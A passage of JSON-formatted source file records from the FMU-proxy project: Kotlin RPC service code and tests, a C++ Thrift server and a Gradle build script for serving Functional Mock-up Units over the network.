Causality.CALCULATED_PARAMETER -> no.mechatronics.sfi.fmuproxy.avro.Causality.CALCULATED_PARAMETER_CAUSALITY\n Causality.PARAMETER -> no.mechatronics.sfi.fmuproxy.avro.Causality.PARAMETER_CAUSALITY\n Causality.LOCAL -> no.mechatronics.sfi.fmuproxy.avro.Causality.LOCAL_CAUSALITY\n Causality.INDEPENDENT -> no.mechatronics.sfi.fmuproxy.avro.Causality.INDEPENDENT_CAUSALITY\n else 
-> throw IllegalArgumentException()\n }\n}\n\ninternal fun Variability.avroType(): no.mechatronics.sfi.fmuproxy.avro.Variability {\n return when(this) {\n Variability.CONSTANT -> no.mechatronics.sfi.fmuproxy.avro.Variability.CONSTANT_VARIABILITY\n Variability.CONTINUOUS -> no.mechatronics.sfi.fmuproxy.avro.Variability.CONTINUOUS_VARIABILITY\n Variability.DISCRETE -> no.mechatronics.sfi.fmuproxy.avro.Variability.DISCRETE_VARIABILITY\n Variability.FIXED -> no.mechatronics.sfi.fmuproxy.avro.Variability.FIXED_VARIABILITY\n Variability.TUNABLE -> no.mechatronics.sfi.fmuproxy.avro.Variability.TUNABLE_VARIABILITY\n else -> throw IllegalArgumentException()\n }\n}\n\ninternal fun Initial.avroType(): no.mechatronics.sfi.fmuproxy.avro.Initial {\n return when(this) {\n Initial.CALCULATED -> no.mechatronics.sfi.fmuproxy.avro.Initial.CALCULATED_INITIAL\n Initial.EXACT -> no.mechatronics.sfi.fmuproxy.avro.Initial.EXACT_INITIAL\n Initial.APPROX -> no.mechatronics.sfi.fmuproxy.avro.Initial.APPROX_INITIAL\n else -> throw IllegalArgumentException()\n }\n}\n\ninternal fun DependenciesKind.avroType(): no.mechatronics.sfi.fmuproxy.avro.DependenciesKind {\n return when(this) {\n DependenciesKind.DEPENDENT -> no.mechatronics.sfi.fmuproxy.avro.DependenciesKind.DEPENDENT_KIND\n DependenciesKind.CONSTANT -> no.mechatronics.sfi.fmuproxy.avro.DependenciesKind.CONSTANT_KIND\n DependenciesKind.TUNABLE -> no.mechatronics.sfi.fmuproxy.avro.DependenciesKind.TUNABLE_KIND\n DependenciesKind.DISCRETE -> no.mechatronics.sfi.fmuproxy.avro.DependenciesKind.DISCRETE_KIND\n else -> throw IllegalArgumentException()\n }\n}\n\ninternal fun FmiStatus.avroType(): Status {\n return when (this) {\n FmiStatus.OK -> Status.OK_STATUS\n FmiStatus.Warning -> Status.WARNING_STATUS\n FmiStatus.Discard -> Status.DISCARD_STATUS\n FmiStatus.Error -> Status.ERROR_STATUS\n FmiStatus.Fatal -> Status.FATAL_STATUS\n FmiStatus.Pending -> Status.PENDING_STATUS\n FmiStatus.NONE -> throw RuntimeException()\n }\n}\n" }, { "alpha_fraction": 0.6303380727767944, "alphanum_fraction": 0.6316726207733154, "avg_line_length": 27.112499237060547, "blob_id": "0f600766ea6690aea0730c9dd4bfbe5a9e0ce42b", "content_id": "e0b9659d030511e48094e033c6a546b2b848448b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 2248, "license_type": "permissive", "max_line_length": 89, "num_lines": 80, "path": "/java/FMU-proxy/fmu-proxy-gen/src/test/kotlin/no/mechatronics/sfi/fmuproxy/TestProxyGen.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "package no.mechatronics.sfi.fmuproxy\n\nimport no.mechatronics.sfi.fmi4j.modeldescription.ModelDescriptionParser\nimport org.junit.jupiter.api.*\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.File\nimport java.io.FileInputStream\nimport java.util.zip.ZipEntry\nimport java.util.zip.ZipInputStream\n\n@TestInstance(TestInstance.Lifecycle.PER_CLASS)\nclass TestProxyGen {\n\n companion object {\n val LOG: Logger = LoggerFactory.getLogger(ExecutableGenerator::class.java)\n }\n\n private val generatedJar: File\n\n init {\n val url = TestProxyGen::class.java.classLoader\n .getResource(\"fmus/cs/PumpControlledWinch/modelDescription.xml\")\n Assertions.assertNotNull(url)\n\n val xml = url.readText()\n val modelDescription = ModelDescriptionParser.parse(xml)\n generatedJar = File(\"${modelDescription.modelName}.jar\")\n\n }\n\n @AfterAll\n fun tearDown() {\n if (generatedJar.exists()) {\n if (generatedJar.delete()) {\n LOG.debug(\"Deleted 
generated jar '$generatedJar'\")\n }\n }\n }\n\n @Test\n fun generate() {\n\n val file = File(javaClass.classLoader\n .getResource(\"fmus/cs/PumpControlledWinch/PumpControlledWinch.fmu\").file)\n Assertions.assertTrue(file.exists())\n val args = arrayOf(\n \"-fmu\", file.absolutePath,\n \"-out\", File(\".\").absolutePath\n )\n ApplicationStarter.main(args)\n\n Assertions.assertTrue(generatedJar.exists())\n\n Assertions.assertTrue(isPresentInJar(\"modelDescription.xml\"))\n Assertions.assertTrue(isPresentInJar(\"definitions.proto\"))\n Assertions.assertTrue(isPresentInJar(\"service.proto\"))\n Assertions.assertTrue(isPresentInJar(\"unique_service.proto\"))\n\n }\n\n private fun isPresentInJar(path: String): Boolean {\n\n ZipInputStream(FileInputStream(generatedJar)).use {\n\n var nextEntry: ZipEntry? = it.nextEntry\n while (nextEntry != null) {\n val name = nextEntry.name\n if (name == path) {\n return true\n }\n nextEntry = it.nextEntry\n }\n\n }\n return false\n\n }\n\n}" }, { "alpha_fraction": 0.6012333035469055, "alphanum_fraction": 0.6076053380966187, "avg_line_length": 29.99363136291504, "blob_id": "a6bb9bf4790428ada6f7017158b2ebdfc4f62cd6", "content_id": "1194c7c463aab938ff010343006404e45c5eb990", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 4865, "license_type": "permissive", "max_line_length": 86, "num_lines": 157, "path": "/java/FMU-proxy/fmu-proxy/src/test/kotlin/no/mechatronics/sfi/fmuproxy/jsonrpc/TestService.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "package no.mechatronics.sfi.fmuproxy.jsonrpc\n\nimport info.laht.yajrpc.RpcHandler\nimport info.laht.yajrpc.RpcParams\nimport info.laht.yajrpc.RpcRequestOut\nimport info.laht.yajrpc.RpcResponse\nimport no.mechatronics.sfi.fmi4j.common.FmiStatus\nimport no.mechatronics.sfi.fmi4j.common.FmuRealRead\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport no.mechatronics.sfi.fmi4j.modeldescription.ModelDescriptionParser\nimport no.mechatronics.sfi.fmuproxy.TestUtils\nimport no.mechatronics.sfi.fmuproxy.jsonrpc.service.RpcFmuService\nimport no.mechatronics.sfi.fmuproxy.jsonrpc.service.StepResult\nimport org.junit.jupiter.api.Assertions\nimport org.junit.jupiter.api.Test\nimport org.junit.jupiter.api.TestInstance\nimport org.junit.jupiter.api.condition.EnabledOnOs\nimport org.junit.jupiter.api.condition.OS\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.File\n\n@EnabledOnOs(OS.WINDOWS)\n@TestInstance(TestInstance.Lifecycle.PER_CLASS)\nclass TestService {\n\n companion object {\n val LOG: Logger = LoggerFactory.getLogger(TestService::class.java)\n }\n\n private val fmu = Fmu.from(File(TestUtils.getTEST_FMUs(),\n \"FMI_2.0/CoSimulation/win64/FMUSDK/2.0.4/BouncingBall/bouncingBall.fmu\"))\n private val handler = RpcHandler(RpcFmuService(fmu))\n \n @Test\n fun testModelName() {\n\n val modelName = \"\"\"\n {\n \"jsonrpc\": \"2.0\",\n \"id\": 1,\n \"method\": \"FmuService.getModelName\",\n \"params\": []\n }\n \"\"\".let {\n RpcResponse.fromJson(handler.handle(it)!!)\n .getResult<String>()\n }\n\n LOG.info(\"modelName=$modelName\")\n Assertions.assertEquals(fmu.modelDescription.modelName, modelName)\n\n }\n\n @Test\n fun testGuid() {\n\n val guid = \"\"\"\n {\n \"jsonrpc\": \"2.0\",\n \"id\": 1,\n \"method\": \"FmuService.getGuid\",\n \"params\": null\n }\n \"\"\".let {\n RpcResponse.fromJson(handler.handle(it)!!).getResult(String::class.java)\n }\n\n LOG.info(\"guid=$guid\")\n 
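                // A minimal sketch of the same round trip without the raw JSON string,
                // using only YAJ-RPC types already imported in this file; `queryModelName`
                // is a hypothetical helper, not part of the project:
                //
                //     fun queryModelName(handler: RpcHandler): String? {
                //         val request = RpcRequestOut(
                //                 methodName = "FmuService.getModelName",
                //                 params = RpcParams.noParams()
                //         ).toJson()
                //         // handle() returns the serialized JSON-RPC response (null for notifications)
                //         return handler.handle(request)?.let {
                //             RpcResponse.fromJson(it).getResult(String::class.java)
                //         }
                //     }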
Assertions.assertEquals(fmu.modelDescription.guid, guid)\n\n }\n\n @Test\n fun testModelDescriptionXml() {\n\n val xml = \"\"\"\n {\n \"jsonrpc\": \"2.0\",\n \"id\": 1,\n \"method\": \"FmuService.getModelDescriptionXml\",\n \"params\": []\n }\n \"\"\".let {\n RpcResponse.fromJson(handler.handle(it)!!).getResult(String::class.java)!!\n }\n\n ModelDescriptionParser.parse(xml).asCoSimulationModelDescription()\n\n }\n\n @Test\n fun testInstance() {\n\n val fmuId = RpcRequestOut(\n methodName = \"FmuService.createInstanceFromCS\",\n params = RpcParams.noParams()\n ).toJson().let { RpcResponse.fromJson(handler.handle(it)!!) }\n .getResult(Int::class.java)!!\n\n val init = RpcRequestOut(\n methodName = \"FmuService.init\",\n params = RpcParams.listParams(fmuId)\n ).toJson().let { RpcResponse.fromJson(handler.handle(it)!!) }\n .getResult(FmiStatus::class.java)!!\n\n Assertions.assertEquals(FmiStatus.OK, init)\n\n val currentTimeMsg = RpcRequestOut(\n methodName = \"FmuService.getCurrentTime\",\n params = RpcParams.listParams(fmuId)\n ).toJson()\n\n fun currentTime() = currentTimeMsg\n .let{ RpcResponse.fromJson(handler.handle(it)!!) }\n .getResult(Double::class.java)!!\n\n val currentTime = currentTime()\n LOG.info(\"currentTime=$currentTime\")\n Assertions.assertEquals(0.0, currentTime)\n\n val h = RpcRequestOut(\n methodName = \"FmuService.readReal\",\n params = RpcParams.listParams(fmuId, \"0\")\n ).toJson().let{ RpcResponse.fromJson(handler.handle(it)!!) }\n .getResult(FmuRealRead::class.java)!!\n\n LOG.info(\"h=$h\")\n Assertions.assertEquals(1.0, h.value)\n\n val stepMsg = RpcRequestOut(\n methodName = \"FmuService.step\",\n params = RpcParams.mapParams(\"fmuId\" to fmuId, \"stepSize\" to 1E-3)\n ).toJson()\n\n for (i in 0 until 5) {\n val stepResult = stepMsg\n .let { RpcResponse.fromJson(handler.handle(it)!!) 
}\n .getResult(StepResult::class.java)!!\n Assertions.assertEquals(FmiStatus.OK, stepResult.status)\n\n LOG.info(\"currentTime=${currentTime()}\")\n\n }\n\n val terminateMsg = RpcRequestOut(\n methodName = \"FmuService.terminate\",\n params = RpcParams.listParams(fmuId)\n ).toJson()\n\n val status = RpcResponse.fromJson(handler.handle(terminateMsg)!!)\n .getResult(FmiStatus::class.java)!!\n Assertions.assertEquals(FmiStatus.OK, status)\n\n }\n\n}" }, { "alpha_fraction": 0.7577450275421143, "alphanum_fraction": 0.7618080377578735, "avg_line_length": 37.588233947753906, "blob_id": "7afcb814778febefa49abbf4a17adbb655ba1525", "content_id": "1d5c910ed8b1cd3e4e27237b63eca06069c3b6a8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1969, "license_type": "permissive", "max_line_length": 127, "num_lines": 51, "path": "/cpp/FMU-proxy/server/ThriftServer.cpp", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\n\n#include \"ThriftServer.h\"\n\nusing namespace std;\nusing namespace fmuproxy;\nusing namespace fmuproxy::server;\n\n\n::ThriftServer::ThriftServer(shared_ptr<FmuWrapper> fmu, int port) {\n\n shared_ptr<FmuServiceHandler> handler(new FmuServiceHandler(fmu));\n shared_ptr<TProcessor> processor(new FmuServiceProcessor(handler));\n shared_ptr<TServerTransport> serverTransport(new TServerSocket(port));\n shared_ptr<TTransportFactory> transportFactory(new TBufferedTransportFactory());\n shared_ptr<TProtocolFactory> protocolFactory(new TBinaryProtocolFactory());\n\n this->server = shared_ptr<TSimpleServer>(new TSimpleServer(processor, serverTransport, transportFactory, protocolFactory));\n\n}\n\nvoid ::ThriftServer::serve() {\n server->serve();\n}\n\nvoid ::ThriftServer::stop() {\n server->stop();\n}\n\n" }, { "alpha_fraction": 0.6689310669898987, "alphanum_fraction": 0.6711099743843079, "avg_line_length": 28.55681800842285, "blob_id": "c3f5f832d52ad76c16dc2df81235cc86ec04f058", "content_id": "876e6f44793e36c85ebfca90243dab60e28f34a4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 7802, "license_type": "permissive", "max_line_length": 99, "num_lines": 264, "path": "/java/FMU-proxy/fmu-proxy/src/main/kotlin/no/mechatronics/sfi/fmuproxy/jsonrpc/service/RpcFmuService.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018. Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.jsonrpc.service\n\nimport com.google.gson.Gson\nimport info.laht.yajrpc.RpcMethod\nimport info.laht.yajrpc.RpcService\nimport no.mechatronics.sfi.fmi4j.common.*\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmuproxy.fmu.Fmus\nimport no.mechatronics.sfi.fmuproxy.solver.parseIntegrator\nimport org.apache.commons.math3.ode.FirstOrderIntegrator\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\n\n\nprivate fun getFmu(id: Int): FmiSimulation {\n val fmu = Fmus.get(id)\n if (fmu != null) {\n return fmu\n }\n throw IllegalArgumentException(\"No fmu with id=$id\")\n}\n\n\n/**\n * @author Lars Ivar Hatledal\n */\nclass RpcFmuService(\n private val fmu: Fmu\n) : RpcService {\n\n override val serviceName = \"FmuService\"\n\n val modelDescription: CommonModelDescription\n @RpcMethod\n get() = fmu.modelDescription\n\n val fmiVersion: String\n @RpcMethod\n get() = modelDescription.fmiVersion\n\n val guid: String\n @RpcMethod\n get() = modelDescription.guid\n\n val modelName: String\n @RpcMethod\n get() = modelDescription.modelName\n\n val modelDescriptionXml: String\n @RpcMethod\n get() = fmu.modelDescriptionXml\n\n\n @RpcMethod\n fun createInstanceFromCS(): Int {\n return Fmus.put(fmu.asCoSimulationFmu().newInstance())\n }\n\n @RpcMethod\n fun createInstanceFromME(solver: Solver): Int {\n\n fun selectDefaultIntegrator(): FirstOrderIntegrator {\n val stepSize = fmu.modelDescription.defaultExperiment?.stepSize ?: 1E-3\n LOG.warn(\"No valid integrator found.. 
Defaulting to Euler with $stepSize stepSize\")\n return org.apache.commons.math3.ode.nonstiff.EulerIntegrator(stepSize)\n }\n\n val integrator = parseIntegrator(solver.name, solver.settings) ?: selectDefaultIntegrator()\n return Fmus.put(fmu.asModelExchangeFmu().newInstance(integrator))\n }\n\n @RpcMethod\n fun isTerminated(fmuId: Int): Boolean {\n return getFmu(fmuId).isTerminated\n }\n\n @RpcMethod\n fun getCurrentTime(fmuId: Int): Double {\n return getFmu(fmuId).currentTime\n }\n\n @RpcMethod\n fun init(fmuId: Int): FmiStatus {\n return getFmu(fmuId).let {\n it.init()\n it.lastStatus\n }\n }\n\n @RpcMethod\n fun init(fmuId: Int, startTime: Double): FmiStatus {\n return getFmu(fmuId).let {\n it.init(startTime)\n it.lastStatus\n }\n }\n\n @RpcMethod\n fun init(fmuId: Int, startTime: Double, stopTime: Double): FmiStatus {\n return getFmu(fmuId).let {\n it.init(startTime, stopTime)\n it.lastStatus\n }\n }\n\n @RpcMethod\n fun step(fmuId: Int, stepSize: Double): StepResult {\n return getFmu(fmuId).let {\n it.doStep(stepSize)\n StepResult(\n simulationTime = it.currentTime,\n status = it.lastStatus\n )\n }\n }\n\n @RpcMethod\n fun terminate(fmuId: Int): FmiStatus {\n return getFmu(fmuId).let {\n it.terminate()\n it.lastStatus\n }\n }\n\n @RpcMethod\n fun reset(fmuId: Int): FmiStatus {\n return getFmu(fmuId).let {\n it.reset()\n it.lastStatus\n }\n }\n\n @RpcMethod\n fun readInteger(fmuId: Int, vr: ValueReference): FmuIntegerRead {\n return getFmu(fmuId).variableAccessor.readInteger(vr)\n }\n\n @RpcMethod\n fun bulkReadInteger(fmuId: Int, vr: ValueReferences): FmuIntegerArrayRead {\n return getFmu(fmuId).variableAccessor.readInteger(vr)\n }\n\n @RpcMethod\n fun readReal(fmuId: Int, vr: ValueReference): FmuRealRead {\n return getFmu(fmuId).variableAccessor.readReal(vr)\n }\n\n @RpcMethod\n fun bulkReadReal(fmuId: Int, vr: ValueReferences): FmuRealArrayRead {\n return getFmu(fmuId).variableAccessor.readReal(vr)\n }\n\n @RpcMethod\n fun readString(fmuId: Int, vr: ValueReference): FmuStringRead {\n return getFmu(fmuId).variableAccessor.readString(vr)\n }\n\n @RpcMethod\n fun bulkReadString(fmuId: Int, vr: ValueReferences): FmuStringArrayRead {\n return getFmu(fmuId).variableAccessor.readString(vr)\n }\n\n @RpcMethod\n fun readBoolean(fmuId: Int, vr: ValueReference): FmuBooleanRead {\n return getFmu(fmuId).variableAccessor.readBoolean(vr)\n }\n\n @RpcMethod\n fun bulkReadBoolean(fmuId: Int, vr: ValueReferences): FmuBooleanArrayRead {\n return getFmu(fmuId).variableAccessor.readBoolean(vr)\n }\n\n @RpcMethod\n fun writeInteger(fmuId: Int, vr: ValueReference, value: Int): FmiStatus {\n return getFmu(fmuId).variableAccessor.writeInteger(vr, value)\n }\n\n @RpcMethod\n fun bulkWriteInteger(fmuId: Int, vr: ValueReferences, value: IntArray): FmiStatus {\n return getFmu(fmuId).variableAccessor.writeInteger(vr, value)\n }\n\n @RpcMethod\n fun writeReal(fmuId: Int, vr: ValueReference, value: Double): FmiStatus {\n return getFmu(fmuId).variableAccessor.writeReal(vr, value)\n }\n\n @RpcMethod\n fun bulkWriteReal(fmuId: Int, vr: ValueReferences, value: DoubleArray): FmiStatus {\n return getFmu(fmuId).variableAccessor.writeReal(vr, value)\n }\n\n @RpcMethod\n fun writeString(fmuId: Int, vr: ValueReference, value: String): FmiStatus {\n return getFmu(fmuId).variableAccessor.writeString(vr, value)\n }\n\n @RpcMethod\n fun bulkWriteString(fmuId: Int, vr: ValueReferences, value: StringArray): FmiStatus {\n return getFmu(fmuId).variableAccessor.writeString(vr, value)\n }\n\n @RpcMethod\n fun writeBoolean(fmuId: Int, 
vr: ValueReference, value: Boolean): FmiStatus {\n return getFmu(fmuId).variableAccessor.writeBoolean(vr, value)\n }\n\n @RpcMethod\n fun bulkWriteBoolean(fmuId: Int, vr: ValueReferences, value: BooleanArray): FmiStatus {\n return getFmu(fmuId).variableAccessor.writeBoolean(vr, value)\n }\n\n private companion object {\n val LOG: Logger = LoggerFactory.getLogger(RpcFmuService::class.java)\n }\n\n}\n\nclass StepResult(\n val status: FmiStatus,\n val simulationTime: Double\n)\n\nclass Solver(\n val name: String,\n val settings: String\n) {\n\n// private val properties = Gson().fromJson(json, Map::class.java) as Map<String, *>\n//\n// fun <T> getProperty(name: String, type: Class<T>): T? {\n// return properties[name] as T\n// }\n//\n// inline fun <reified T> getProperty(name: String): T? {\n// return getProperty(name, T::class.java)\n// }\n\n}" }, { "alpha_fraction": 0.6483679413795471, "alphanum_fraction": 0.6587536931037903, "avg_line_length": 26.520408630371094, "blob_id": "9bc71f1b1fb314f03baecbd55c9e26b1a304710a", "content_id": "213312d81b42e919ef47411efc0bf2ab67a835a3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 2696, "license_type": "permissive", "max_line_length": 92, "num_lines": 98, "path": "/java/FMU-proxy/fmu-proxy/src/test/kotlin/no/mechatronics/sfi/fmuproxy/grpc/TestGrpcBouncingME.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "package no.mechatronics.sfi.fmuproxy.grpc\n\nimport no.mechatronics.sfi.fmi4j.common.FmiStatus\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmuproxy.Solver\nimport no.mechatronics.sfi.fmuproxy.TestUtils\nimport org.junit.jupiter.api.AfterAll\nimport org.junit.jupiter.api.Assertions\nimport org.junit.jupiter.api.Test\nimport org.junit.jupiter.api.TestInstance\nimport org.junit.jupiter.api.condition.EnabledIfEnvironmentVariable\nimport org.junit.jupiter.api.condition.EnabledOnOs\nimport org.junit.jupiter.api.condition.OS\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.File\n\n@EnabledOnOs(OS.WINDOWS)\n@TestInstance(TestInstance.Lifecycle.PER_CLASS)\n@EnabledIfEnvironmentVariable(named = \"TEST_FMUs\", matches = \".*\")\nclass TestGrpcBouncingME {\n\n companion object {\n val LOG: Logger = LoggerFactory.getLogger(TestGrpcBouncingME::class.java)\n }\n\n private val fmu: Fmu\n private val server: GrpcFmuServer\n private val client: GrpcFmuClient\n private val modelDescription: CommonModelDescription\n\n init {\n\n fmu = Fmu.from(File(TestUtils.getTEST_FMUs(),\n \"FMI_2.0/ModelExchange/win64/FMUSDK/2.0.4/BouncingBall/bouncingBall.fmu\"))\n modelDescription = fmu.modelDescription\n\n server = GrpcFmuServer(fmu)\n val port = server.start()\n\n client = GrpcFmuClient(\"127.0.0.1\", port)\n\n }\n\n @AfterAll\n fun tearDown() {\n server.stop()\n client.stop()\n fmu.close()\n }\n\n @Test\n fun testModelName() {\n val modelName = client.modelDescription.modelName.also { LOG.info(\"modelName=$it\") }\n Assertions.assertEquals(modelDescription.modelName, modelName)\n }\n\n @Test\n fun testGuid() {\n val guid = client.modelDescription.guid.also { LOG.info(\"guid=$it\") }\n Assertions.assertEquals(modelDescription.guid, guid)\n }\n\n\n @Test\n fun testInstance() {\n\n val solver = Solver(\"Euler\").apply {\n addProperty(\"step_size\", 1E-3)\n }\n\n client.newInstance(solver).use { instance ->\n\n instance.init()\n Assertions.assertEquals(FmiStatus.OK, 
instance.lastStatus)\n\n val h = instance.getVariableByName(\"h\").asRealVariable()\n\n h.read().also {\n LOG.info(\"h=${it.value}\")\n Assertions.assertEquals(1.0, it.value)\n }\n\n val dt = 1.0/100\n while (instance.currentTime < 2) {\n val step = instance.doStep(dt)\n Assertions.assertTrue(step)\n\n LOG.info(\"h=${h.read()}\")\n\n }\n\n }\n\n }\n\n}" }, { "alpha_fraction": 0.5398753881454468, "alphanum_fraction": 0.5514018535614014, "avg_line_length": 31.414140701293945, "blob_id": "261b3239582895703432d39145837d7374599296", "content_id": "cad501d801de23ea25c87b9caf02b87cadde03ef", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 3210, "license_type": "permissive", "max_line_length": 115, "num_lines": 99, "path": "/java/FMU-proxy/fmu-proxy/build.gradle", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "\nbuildscript {\n repositories {\n jcenter()\n }\n dependencies {\n classpath 'com.github.jengelman.gradle.plugins:shadow:2.0.4'\n }\n}\n\napply plugin: 'kotlin'\napply plugin: 'maven'\napply plugin: 'signing'\napply plugin: 'com.github.johnrengelman.shadow'\n\ngroup = 'no.mechatronics.sfi.fmuproxy'\nversion = '0.1-SNAPSHOT'\n\ndef snapshot = true\ndef fmi4j_version = snapshot ? fmi4j_snapshot_version : fmi4j_stable_version\n\ndependencies {\n\n implementation group: 'io.grpc', name: 'grpc-netty', version: '1.11.0'\n implementation group: 'info.picocli', name: 'picocli', version: '2.3.0'\n implementation group: 'info.laht', name: 'YAJ-RPC', version: '0.7'\n\n compile group: 'no.mechatronics.sfi.fmi4j', name: 'fmi-import', version: fmi4j_version, changing: snapshot\n compile group: 'no.mechatronics.sfi.fmuproxy', name: 'rpc-definitions', version: '0.1-SNAPSHOT', changing: true\n\n implementation group: 'org.slf4j', name: 'slf4j-api', version: '1.7.25'\n runtimeOnly group: 'org.slf4j', name: 'slf4j-log4j12', version: '1.7.25'\n\n testImplementation project(':fmu-proxy-clients')\n\n}\n\njar {\n manifest {\n attributes 'Main-Class': \"no.mechatronics.sfi.fmuproxy.FmuProxy\"\n }\n}\n\nshadowJar {\n baseName = 'fmu-proxy'\n classifier = null\n version = null\n}\n\nif (hasProperty(\"ossrhUsername\") && hasProperty(\"ossrhPassword\")) {\n\n signing {\n sign configurations.archives\n }\n\n uploadArchives {\n repositories {\n mavenDeployer {\n beforeDeployment { MavenDeployment deployment -> signing.signPom(deployment) }\n\n repository(url: \"https://oss.sonatype.org/service/local/staging/deploy/maven2\") {\n authentication(userName: ossrhUsername, password: ossrhPassword)\n }\n\n snapshotRepository(url: \"https://oss.sonatype.org/content/repositories/snapshots\") {\n authentication(userName: ossrhUsername, password: ossrhPassword)\n }\n\n pom.project {\n name archivesBaseName\n packaging 'jar'\n // optionally artifactId can be defined here\n description 'A collection of RPC servers for exposing FMUs over the network'\n url 'https://github.com/SFI-Mechatronics/FMU-proxy'\n\n scm {\n connection 'scm:git:git://github.com/SFI-Mechatronics/FMU-proxy.git'\n developerConnection 'scm:git:ssh://github.com/SFI-Mechatronics/FMU-proxy.git'\n url 'https://github.com/SFI-Mechatronics/FMU-proxy/tree/master'\n }\n\n licenses {\n license {\n name 'The MIT License'\n url 'https://opensource.org/licenses/mit-license.php'\n }\n }\n\n developers {\n developer {\n id 'laht'\n name 'Lars Ivar Hatledal'\n email '[email protected]'\n }\n }\n }\n }\n }\n }\n}\n" }, { "alpha_fraction": 0.6598891019821167, "alphanum_fraction": 
0.6654343605041504, "avg_line_length": 20.215686798095703, "blob_id": "8261180a452d0a5d9423e6388312fec6984adc04", "content_id": "1df90c15ee3bab0931b6ffe942182faff845ef78", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1082, "license_type": "permissive", "max_line_length": 68, "num_lines": 51, "path": "/cpp/FMU-proxy/server/ThriftServer.h", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "//\n// Created by laht on 08.06.18.\n//\n\n#ifndef FMU_PROXY_THRIFTSERVER_H\n#define FMU_PROXY_THRIFTSERVER_H\n\n\n#include <thrift/protocol/TBinaryProtocol.h>\n#include <thrift/server/TSimpleServer.h>\n#include <thrift/transport/TServerSocket.h>\n#include <thrift/transport/TBufferTransports.h>\n\n#include <thrift/protocol/TBinaryProtocol.h>\n#include <thrift/server/TSimpleServer.h>\n#include <thrift/transport/TServerSocket.h>\n#include <thrift/transport/TBufferTransports.h>\n\n#include \"../common/FmuWrapper.h\"\n#include \"FmuServiceHandler.h\"\n\n\nusing namespace ::apache::thrift;\nusing namespace ::apache::thrift::server;\nusing namespace ::apache::thrift::protocol;\nusing namespace ::apache::thrift::transport;\n\nnamespace fmuproxy {\n \n namespace server {\n \n class ThriftServer {\n\n private:\n shared_ptr<TSimpleServer> server;\n\n public:\n ThriftServer(std::shared_ptr<FmuWrapper> fmu, int port);\n \n void serve();\n \n void stop();\n\n };\n \n }\n \n}\n\n\n#endif //FMU_PROXY_THRIFTSERVER_H\n" }, { "alpha_fraction": 0.6620352864265442, "alphanum_fraction": 0.6634122133255005, "avg_line_length": 37.59903335571289, "blob_id": "23e3d135e78e60093c1ec29e982299fa56073920", "content_id": "399e6cc7fac9181455ebaba561723349d43f2c65", "detected_licenses": [ "MIT" ], "is_generated": false, 